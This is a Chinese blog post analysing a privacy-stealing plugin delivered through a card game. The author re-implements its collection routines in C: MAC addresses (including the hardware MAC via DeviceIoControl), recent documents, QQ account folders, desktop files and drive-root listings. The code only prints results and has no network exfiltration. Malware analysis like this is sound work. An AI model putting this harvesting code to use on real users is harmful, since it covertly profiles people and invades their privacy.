收集用户隐私的木马插件分析:第一部分
最近分析一款“特殊”的棋牌游戏,发现其payload是一款收集用户隐私信息的插件,比较好奇该木马收集的哪些用户信息以及具体的实现方式,特此记录。
第一部分主要实现其获取用户MAC地址和一些隐私文档信息的方法,具体如下:
1、获取网卡信息,主要通过GetAdaptersInfo这个API,结合设备控制也可以通过设备路径获取真正的MAC地址:
#include <winsock2.h>
#include <iphlpapi.h>
#include <Shlwapi.h>
#include <stdio.h>
#pragma comment(lib, "IPHLPAPI.lib")
#pragma comment(lib, "shlwapi.lib")
void get_mac_address()
{
int nIndex = 0;
ULONG uOutBufLen = 0; //存放网卡信息的缓冲区大小
PIP_ADAPTER_INFO pIPAdapterInfo = (PIP_ADAPTER_INFO)malloc(sizeof(IP_ADAPTER_INFO));
if((GetAdaptersInfo(pIPAdapterInfo, &uOutBufLen)) == ERROR_BUFFER_OVERFLOW) //第一次调用GetAdapterInfo获取ulOutBufLen大小
{
//获取需要的缓冲区大小
free(pIPAdapterInfo);
pIPAdapterInfo = (PIP_ADAPTER_INFO)malloc(uOutBufLen); //分配所需要的内存
}
if((GetAdaptersInfo(pIPAdapterInfo, &uOutBufLen)) == NO_ERROR)//获取网卡信息
{
PIP_ADAPTER_INFO pAdapter = pIPAdapterInfo;
char buffer[512] = {0};
while(pAdapter)
{
char *pAdapName = pAdapter->AdapterName;
/*DWORD comboIndex = pAdapter->ComboIndex;
DWORD index = pAdapter->Index;
UINT Type = pAdapter->Type;
bool bDhcpOpen = pAdapter->DhcpEnabled;
char *pAdapIpAddr = pAdapter->IpAddressList.IpAddress.String;
char *pAdapIpMask = pAdapter->IpAddressList.IpMask.String;
char *pAdapGateIpAddr = pAdapter->GatewayList.IpAddress.String;
char *pAdapDhcpIpAddr = pAdapter->DhcpServer.IpAddress.String;*/
char *pAdapDesc = pAdapter->Description;
//MAC address
for (int i=0; i<pAdapter->AddressLength; i++) {
if (i == (pAdapter->AddressLength - 1))
wsprintf(buffer, "%s%.2X ", buffer, (int)pAdapter->Address[i]);
else
wsprintf(buffer, "%s%.2X-", buffer, (int)pAdapter->Address[i]);
}
//real MAC address
char pAdapPath[MAX_PATH] = {0};
wsprintf(pAdapPath, "\\\\.\\%s", pAdapName);
HANDLE hAdap = CreateFileA(pAdapPath, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL);
DWORD inBuffer = 0x01010101;
unsigned char outBuffer[0x110] = {0};
DWORD bytesReturned = 0;
bool bOK = DeviceIoControl(hAdap, 0x170002, &inBuffer, sizeof(DWORD), outBuffer, 0x104, &bytesReturned, NULL);
if (!bOK)
{
inBuffer = 0x01010102;
bOK = DeviceIoControl(hAdap, 0x170003, &inBuffer, sizeof(DWORD), outBuffer, 0x104, &bytesReturned, NULL);
}
CloseHandle(hAdap);
wsprintf(buffer, "%s %.2X-%.2X-%.2X-%.2X-%.2X-%.2X %s\n", buffer, outBuffer[0], outBuffer[1], outBuffer[2], outBuffer[3], outBuffer[4], outBuffer[5], pAdapDesc);
pAdapter = pAdapter->Next;
}
printf("%s\n", buffer);
}
}
2、获取用户的最近文件,通过环境变量获取用户路径或程序数据路径,然后找到最近文件目录遍历其中的文件名:
int find_the_dirfiles(IN char* path_dirfile, OUT char* buf_filenames)
{
WIN32_FIND_DATAA wFind = {0};
HANDLE hFind = FindFirstFileA(path_dirfile, &wFind);
char lpDir[MAX_PATH] = {0};
;
memcpy(lpDir, path_dirfile, strrchr(path_dirfile, '\\') - path_dirfile + 1);
int count = 0;
if (hFind != INVALID_HANDLE_VALUE)
{
do
{
char *lpFileName = wFind.cFileName;
if (strcmp(lpFileName, ".") != 0 && strcmp(lpFileName, "..") != 0)
{
wsprintf(buf_filenames, "%s\n%s%s", buf_filenames, lpDir, lpFileName);
count += 1;
}
;
} while (FindNextFileA(hFind, &wFind));
}
else
{
DWORD dwError = GetLastError();
dwError = dwError;
}
return count;
}
void get_user_recent_doc()
{
char buf_filenames[500 * MAX_PATH] = {0};
int count_file = 0;
//lately doc
char buf_path[MAX_PATH] = {0};
GetEnvironmentVariableA("USERPROFILE", buf_path, MAX_PATH);
wsprintf(buf_path, "%s\\Recent\\*.lnk", buf_path); //用户最近文件
count_file = find_the_dirfiles(buf_path, buf_filenames);
//lately document name
GetEnvironmentVariableA("APPDATA", buf_path, MAX_PATH);
wsprintf(buf_path, "%s\\Microsoft\\Windows\\Recent\\*.lnk", buf_path); //最近文件
count_file = find_the_dirfiles(buf_path, buf_filenames);
printf("%s\n", buf_filenames);
}
3、获取用户qq号,通过遍历qq数据目录实现:
void get_user_qq_num()
{
char buf_filenames[500 * MAX_PATH] = {0};
int count_file = 0;
//qq number
char buf_path[MAX_PATH] = {0};
GetEnvironmentVariableA("APPDATA", buf_path, MAX_PATH);
wsprintf(buf_path, "%s\\Tencent\\QQ\\Misc\\*", buf_path); //qq数据目录路径
count_file = find_the_dirfiles(buf_path, buf_filenames);
printf("%s\n", buf_filenames);
}
4、获取用户桌面文件,直接遍历用户桌面目录:
void get_user_desk_filename()
{
char buf_filenames[500 * MAX_PATH] = {0};
int count_file = 0;
//desktop file
char buf_path[MAX_PATH] = {0};
GetEnvironmentVariableA("USERPROFILE", buf_path, MAX_PATH);
wsprintf(buf_path, "%s\\Desktop\\*", buf_path); //英文路径,看系统
count_file = find_the_dirfiles(buf_path, buf_filenames);
//desktop file
GetEnvironmentVariableA("USERPROFILE", buf_path, MAX_PATH);
wsprintf(buf_path, "%s\\桌面\\*", buf_path); //中文路径,看系统
count_file = find_the_dirfiles(buf_path, buf_filenames);
printf("%s\n", buf_filenames);
}
5、遍历磁盘根目录的文件:
void get_disk_root_filename()
{
char buf_filenames[500 * MAX_PATH] = {0};
int count_file = 0;
char buf[0x64] = {0};
GetLogicalDriveStringsA(0x64, buf);
if (buf[0] != 0)
{
for (int i=0; i<0x64; )
{
if (buf[i] == 0)
{
break;
}
char logicDrivePath[0x10] = {0};
memcpy(logicDrivePath, &buf[i], 0x4);
if (PathFileExistsA(logicDrivePath))
{
wsprintf(logicDrivePath, "%s\\*", logicDrivePath);
count_file = find_the_dirfiles(logicDrivePath, buf_filenames);
}
i = i + 4;
}
}
printf("%s\n", buf_filenames);
}
这部分比较简单,也没啥好总结的,主要就是对特定目录的文件遍历及如何获取网卡信息。
目前没有反馈
表单载入中...